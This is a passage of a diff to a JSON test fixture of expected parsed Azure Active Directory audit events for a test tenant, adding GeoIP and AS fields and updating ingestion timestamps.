"BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2006,7 +2138,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124885800Z", + "ingested": "2021-12-14T14:48:43.176641310Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -2033,6 +2165,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2199,7 +2343,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124892700Z", + "ingested": "2021-12-14T14:48:43.176642230Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -2226,6 +2370,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2392,7 +2548,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124899400Z", + "ingested": "2021-12-14T14:48:43.176642972Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -2419,6 +2575,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2585,7 +2753,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124905900Z", + "ingested": "2021-12-14T14:48:43.176643610Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -2612,6 +2780,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2778,7 +2958,7 @@ "ip": 